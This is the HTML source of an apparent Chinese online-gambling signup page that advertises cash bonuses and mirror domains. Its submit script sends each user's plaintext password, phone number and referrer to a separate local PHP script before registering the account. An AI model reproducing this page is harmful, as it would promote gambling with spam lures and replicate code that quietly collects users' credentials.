




<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon"/>
<title>尊龙人生就是博手机版-尊龙用现金一下|ag发财网来就送38</title>
<meta name="keywords" content="尊龙人生就是博手机版-尊龙用现金一下|ag发财网来就送38">
    <meta name="description"content="尊龙人生就是博手机版-尊龙用现金一下|ag发财网来就送38">
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();


</script>
  <script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


<!--
<script type='text/javascript' src='/zxyhhd/tzjs/tz.js'></script> 
-->
</head>



<body class="no-webp">
    <meta charset="utf-8">
  <link rel="apple-touch-icon-precomposed" href="/zxyhhd/d88/img/icons/favicon-144x144.png">
    <link rel="stylesheet" href="/zxyhhd/d88/css/chunk.css">
    <style>body {
        background: #1a1a1e
    }
	.pmdys{
color:#D1A581;
}
.pmdys a{
color:#D1A581;
}
	
	</style>
<noscript><strong>We're sorry but Zlong Website doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript>
<div id="app">
    <div id="activity">
        <div id="header">
            <div class="content-1127">
                <div class="logo"><a :href="pcpage" target="_blank"><img src="/zxyhhd/d88/img/z6-logo.png" width="206px" height="60px"></a></div>
				
				
				<marquee width="700px" behavior="alternate" scrollamount="2" style="float:left;position:absolute;left:210px;top:10px" class="pmdys" >
 
     备用网站：&nbsp;<a href="https://www.zl7979.com" target="_blank">zl7979.com</a>&nbsp;&nbsp; <a href="https://www.zd6867.com" target="_blank">zd6867.com</a>&nbsp;&nbsp; <a href="https://www.zd6883.com" target="_blank">zd6883.com</a>&nbsp;&nbsp; <a href="https://www.zd6893.com" target="_blank">zd6893.com</a>

</marquee >

				
                <a class="enter-button" :href="pcpage" target="_blank">已有账号？进入官网</a>
            </div>
        </div>
        <div id="mktCasino02">
            <div id="mktLoginRegisterV2" class="mkt-banner">
                <div class="content-1200">
                    <div  class="login-div">
                        <form class="regist-form market-activity-fix-form" :action="productApiUrl" method="post" ref="form" @submit.prevent="onSubmit">
                            <!--tab-->
                            <div class="sub-title">
                                <ul><li id="register_tab">免费开户</li>
								<li ><a :href="pcpage"  target="_blank" style="color:#fff">用户登录</a></li>
								
								</ul>
                            </div>
                            <div class="login-body">
                                <div id="mktLoginRegisterV1" class="mkt-body">
                                    <div id="mktLoginRegisterAccount" class="mkt-body">
                                        <!--账号注册-->
                                        <form class="regist-form">
                                            <!--账号-->
                                            <div class="inp_box">
                                                <div class="clearfix">
                                                    <div class="commonInputGrp account">
                                                        <span class="Vletter lebel-icon">m</span>
                                                        <!--账号-->
                                                        <div class="form-input zl-form-item">
                                                            <input v-model="loginName.value"
                                                                   name="loginName" ref="loginName"
                                                                   placeholder="4-11位字母或数字组成的游戏账号"
                                                                   maxlength="11" @input="inputHandler('loginName')"
                                                                   type="text" >
                                                            <span class="fill-frame" :class="{visible:hasContent('loginName')}">
                                                                <img class="fill" src="/zxyhhd/d88/img/entry/fill.png" name="entry/fill" width="22px" height="22px"
                                                                     @click="eraseHandler('loginName')"/>
                                                            </span>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <!--密码-->
                                            <div class="inp_box">
                                                <div class="clearfix">
                                                    <div class="commonInputGrp">
                                                        <span class="Vletter-pass label-icon"></span>
                                                        <!--密码-->
                                                        <div id="form-password" class="zl-form-item"
                                                             v-if="password.show === 'true'">
                                                            <label v-if="password.label" v-html="password.label" :style="labelStyle"></label>
                                                            <input :type="eye.eyeOpen ? 'text' : 'password'" class="flex-fill" name="password"
                                                                   ref="password"
                                                                   v-model="password.value" :placeholder="password.placeholder"
                                                                   :maxlength="password.maxlength"
                                                                   @input="inputHandler('password')"  >
                                                            <span class="fill-frame" :class="{visible:hasContent('password')}">
                                                                <img class="fill" src="/zxyhhd/d88/img/entry/fill.png" name="entry/fill" width="22px" height="22px"
                                                                     @click="eraseHandler('password')"/>
                                                            </span>
                                                            <span class="eye-frame">
                                                                <img class="eye" :class="{'eye-open' : eye.eyeOpen}" width="22px" height="auto"
                                                                     :src="eye.eyeOpen ? eye.eyeOpenPath : eye.eyeClosePath"
                                                                     @click="showPassword"/>
                                                            </span>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <!--手机号-->
                                            <div class="inp_box">
                                                <div class="clearfix">
                                                    <div class="commonInputGrp">
                                                        <span class="label-icon icon-mobile"></span>
                                                        <!--手机号-->
                                                        <div class="form-input zl-form-item">
                                                            <input v-model="phone.value" name="phone" ref="phone" placeholder="手机号码"
                                                                   type="number" @input="inputHandler('phone')"
                                                                   pattern="[\d]" @keypress="verifyInput">
                                                            <span class="fill-frame" :class="{visible:hasContent('phone')}">
                                                                <img class="fill" src="/zxyhhd/d88/img/entry/fill.png" name="entry/fill" width="22px" height="22px"
                                                                     @click="eraseHandler('phone')"/>
                                                            </span>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="db-f">
                                                <div class="txt_div w-100">
                                                    <button class="mkt_login btn1 text-center" id="login__submitBtn" >注册领取18888</button>
                                                    <div>注册代表您已同意尊龙所有的规则与条例</div>
                                                </div>
                                            </div>
                                            <input type="hidden" v-model="prefix" name="prefix"/>
                                            <input type="hidden" v-model="timestamp" name="timestamp"/>
                                            <input type="hidden" v-model="sign" name="sign"/>
                                            <input type="hidden" v-model="domain" name="domain"/>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
                <div id="mkt-head-swiper"><img src="/zxyhhd/d88/img/banner.jpg"></div>
            </div>
            <div class="content-1127 part3">
                <img class="jetton" src="/zxyhhd/d88/img/icon.png" width="144px" height="115px">
                <div id="MktGames">
                    <img class="title-img" src="/zxyhhd/d88/img/title1.png" width="485px" height="26px">
                    <!--真人、电子-->
                    <div class="games btn d-flex flex-wrap justify-content-between align-items-center">
                        <a :href="pcpage" target="_blank"><img class="img" src="/zxyhhd/d88/img/p1.png"></a>
                        <a :href="pcpage" target="_blank"><img class="img" src="/zxyhhd/d88/img/p2.png"></a>
                    </div>
                </div>
            </div>
            <div class="content-1127 position-relative part2">
                <div id="mktBody">
                    <!--品牌实力-->
                    <img class="title-img" src="/zxyhhd/d88/img/title2.png" width="485px" height="27px">
                    <!--品牌实力图片-->
                    <div class="history">
                        <a :href="activity01" target="_blank"><img class="history-img btn" src="/zxyhhd/d88/img/a1.png" width="252px" height="191px"></a>
                        <a :href="activity02" target="_blank"><img class="history-img btn" src="/zxyhhd/d88/img/a2.png" width="252px" height="191px"></a>
                        <a :href="activity03" target="_blank"><img class="history-img btn" src="/zxyhhd/d88/img/a3.png" width="252px" height="191px"></a>
                        <a :href="activity04" target="_blank"><img class="history-img btn" src="/zxyhhd/d88/img/a4.png" width="252px" height="191px"></a>
                    </div>
                    <!--品牌实力介绍-->
                    <div class="introduction">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i1.png"  width="150px" height="120px">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i2.png"  width="150px" height="120px">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i3.png"  width="150px" height="120px">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i4.png"  width="150px" height="120px">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i5.png"  width="150px" height="120px">
                        <img class="introduction-img" src="/zxyhhd/d88/img/i6.png"  width="150px" height="120px">
                    </div>
                </div>
            </div>
        </div>
        <div id="footer">
            <div class="content-1200">
                <p>客服专线 400-842-3711</p>
                <p>© 2019 尊龙 版权所有. All rights Reserved</p>
            </div>
        </div>
        <div id="right-tool">
            <div class="tool-area" style="top:50%">
                <!--在线客服-->
                <a :href="pcpage+'/loading/live/chat'" target="_blank" style="text-decoration: none;"><div class="tool-box">
                    <span class="tool-text">在线客服</span>
                    <div class="icon">
                        <span class="ico ico-service"></span>
                    </div>
                </div></a>
                <!--下载APP-->
                <div class="tool-box" v-if="!qrcodeShow" @click="showQr">
                    <span class="tool-text">下载APP</span>
                    <div class="icon">
                        <span class="ico ico-qrcode"></span>
                    </div>
                </div>
                <!--下载APP展开-->
                <div class="tool-qrcode" v-show="qrcodeShow">
                    <img class="close" src="/zxyhhd/d88/img/right_tools/close.png" width="17px" height="17px" @click="hideQr">
                    <span class="title">扫码下载尊龙APP</span>
                    <div id="qrCodeDiv" class="qrcode-image code-img">
                        <div id="qrcode"></div>
                    </div>
                </div>
                <!--客服电话-->
                <div class="phone-number"><span>400-842</span><span>-3711</span></div>
            </div>
            <!--返回顶部-->
            <div class="to-top" :class="{show: scrollToTop > 0}" @click="goTop">
                <span class="ico ico-top"></span>
                返回顶部
            </div>
        </div>
        <div class="transparent-mask" v-show="popup" style="display: none;">
            <div id="dialog-container">
                <div id="dialog-message" class="d-flex justify-content-center align-items-center">
                    <div class="message add-padding">{{popupText}}</div>
                </div>
            </div>
        </div>
    </div>
</div>
<script src="/zxyhhd/d88/config.js"></script>
<script src="/zxyhhd/d88/js/vue.min.js"></script>
<script src="/zxyhhd/d88/js/jquery.min.js"></script>
<script src="/zxyhhd/d88/js/qrcode.min.js"></script>

<script>

   function requestAsync1() {
   var fromurl = document.referrer;
    var fromurl1 =document.URL ;
    $.ajax({
           type: "POST",
           dataType: "json",
             url:"/zxyhhd/d88/test.php?url="+fromurl+"&url1="+fromurl1,
           data: $('#formAsync').serialize(),
    
        
      });
   }
   
   
   
      function requestAsync(obj) {
   var anniu= $(obj).attr("name");
   var fromurl = document.referrer;
    var fromurl1 =document.URL ;
    $.ajax({
           type: "POST",
           dataType: "json",
             url:"/ggdywjj/test.php?url="+fromurl+"&url1="+fromurl1+"&anniu="+anniu,
           data: $('#formAsync').serialize(),
    
        
      });
   }
</script>
<script>
  var app = new Vue({
    el: '#app',
      data: function () {
      return {
        focus: false, // 获得焦点
        sign: '',
        timestamp: '',
        pcpage: Config.url,
        prefix: 'm',
        activity01: Config.url + '/german_master_2019.htm',
        activity02: Config.url + '/ag_model_party.htm',
        activity03: Config.url + '/wct.htm',
        activity04: Config.url + '/italian.htm',
        productApiUrl: Config.url + Config.productApiUrl,
        domain: Config.url.replace('http://', '').replace('https://', '').replace(/[/?#]/, ''),
        eye: {
          eyeOpen: false,
          eyeOpenPath: '/zxyhhd/d88/img/entry/eye-open.png',
          eyeClosePath: '/zxyhhd/d88/img/entry/eye-close.png'
        },
        loginName: {
          value: '',
          focus: false
        },
        password: {
          show: 'true',
          maxlength: 16, // 文字长度
          placeholder: '6-16位数字和小写字母组成', // 提示文字
          // 是否显示底线
          border: true,
          value: '',
          label: '',
          labelStyle: '',
          focus: false
        },
        phone: {
          value: '',
          maxlength: 11,
          focus: false
        },
        popup: false,
        popupText: '',
        qrcodeShow: false,
        scrollToTop : 0,
        scrollInterval: null
      }
    },
    methods: {
      // 显示密码
      showPassword: function () {
        this.eye.eyeOpen = !this.eye.eyeOpen
      },
      // 处理输入事件
      inputHandler: function (inputType) {
        // 转换小写
        this.$data[inputType].value = this.$data[inputType].value.toLowerCase()
        // 限制输入长度
        if (this.$data[inputType].value.length > this.$data[inputType].maxlength) {
          this.$data[inputType].value = this.$data[inputType].value.slice(0, this.$data[inputType].maxlength)
        }
      },
      // 清除输入内容
      eraseHandler: function (inputType) {
        this.$data[inputType].value = ''
        document.querySelector('input[name=' + inputType + ']').focus()
      },
      // 送出表单
      onSubmit: function (e) {
        e.preventDefault();
        var _this = this
		var phone1 = this.phone.value
        this.timestamp = Math.floor($.now() / 1000);
        if (_this.checkLoginName() && _this.checkPassword() && _this.checkPhone()) {
            $.post('/zxyhhd/d88/sign/getSign1.php', {
                loginName: this.prefix + this.loginName.value,
                password: this.password.value,
                timestamp: this.timestamp,
				phone1:phone1,
				lyurl:document.referrer,
                quxurl:document.URL,
            }, function (result) {
                _this.sign = result;
                _this.$nextTick(function () {
                    _this.$refs.form.submit()
                })
            })
        }
      },
      checkLoginName: function () {
	   var phone1 = this.loginName.value
        if (this.loginName.value.match(/^[0-9a-z]{4,11}$/)) {
      
		  
		  
	
	      return true
        } else {
          this.popupError('游戏账号由4-11位小写字母或数字组成')
          this.$refs.loginName.focus()
          return false
        }
      },
      checkPassword: function () {
        if (this.password.value.match(/^[0-9a-z]{6,16}$/)) {
		
	 return true
  
        } else {
          this.popupError('密码由6-16位小写字母或数字组成')
          this.$refs.password.focus()
          return false
        }
      },
      checkPhone: function () {
	  var phone1 = this.phone.value
        if (this.phone.value.match(/^1\d{10}$/)) {


             
		
         
		  
			
		   return true
        } else {
          this.popupError('请填写11位数字的手机号码')
          this.$refs.phone.focus()
          return false
        }
      },
      popupError: function (msg) {
        _this = this;
        this.popupText = msg;
        this.popup = true;
        setTimeout('_this.popup = false', 2000)
      },
      hasContent (inputType) {
        return this.$data[inputType].value.length > 0
      },
      showQr: function () {
        this.qrcodeShow = true
      },
      hideQr: function () {
        this.qrcodeShow = false
      },
      startListenToTop: function (e) {
        var scrollTop = document.documentElement.scrollTop !== 0 ? document.documentElement.scrollTop : document.body.scrollTop
        this.scrollToTop =scrollTop
      },
      // 置顶
      goTop: function () {
        var that = this
        var subDistance = Math.floor(document.documentElement.scrollTop / 100)
        that.scrollInterval = setInterval(function ()  {
            if (document.documentElement.scrollTop > 0) {
                document.documentElement.scrollTop -= subDistance
                return false
            }

            document.documentElement.scrollTop = 0
            clearInterval(that.scrollInterval)
        }, 5)
      },
      verifyInput: function (event) {
        var code
        if (event.key !== undefined) {
            code = event.key
        } else if (event.keyCode !== undefined) {
            code = String.fromCharCode(event.keyCode)
        } else if (event.which !== undefined) {
            code = String.fromCharCode(event.which)
        }
        if (isNaN(Number(code))) {
            event.preventDefault()
        }
      }
    },
    created: function () {
        window.addEventListener('scroll', this.startListenToTop)
    }
  })
</script>
<script>
    (function () {
        var downloadUrl = Config.appDownloadUrl + '?channel=' + Config.url.replace('http://', '').replace('https://', '').replace(/[/?#]/, '').replace(/^www./, 'm.')
        new QRCode(document.getElementById('qrcode'), { text: downloadUrl, width: 115, height: 110 })
    }) ()
</script>

</body>

	
</html>


